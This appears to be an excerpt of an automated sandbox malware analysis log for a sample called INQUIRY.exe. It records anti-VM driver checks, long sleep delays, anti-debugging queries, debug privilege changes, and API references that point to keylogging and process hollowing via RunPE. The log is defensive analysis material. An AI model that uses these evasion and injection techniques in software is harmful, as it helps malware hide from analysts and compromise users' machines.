                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Contains functionality to detect sleep reduction / modifications
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6756Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4780Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6820Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6780Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99750s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98797s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -98047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97406s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97297s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -97047s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96953s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5980Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4476Thread sleep count: 213 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6432Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6444Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6292Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5900Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98562s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -98062s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97812s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97609s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97500s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97359s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6848Thread sleep time: -97250s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6600Thread sleep count: 150 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 612Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 7136Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6320Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 6328Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 1548Thread sleep count: 51 > 30
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5260Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5492Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5560Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5508Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\Desktop\INQUIRY.exe TID: 5956Thread sleep count: 99 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe File opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\INQUIRY.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\INQUIRY.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_004089B8 FindFirstFileA,GetLastError,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00421010 GetSystemInfo,
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW|p
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.818731802.0000000004BCC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: WerFault.exe, 00000009.00000002.730528117.000000000481B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWonic0Local Area Connection* 7
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.731103149.0000000004F00000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.819145650.0000000004EC0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugFlags
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process queried: DebugObjectHandle
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048A746 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Memory protected: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    .NET source code references suspicious native API functions
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
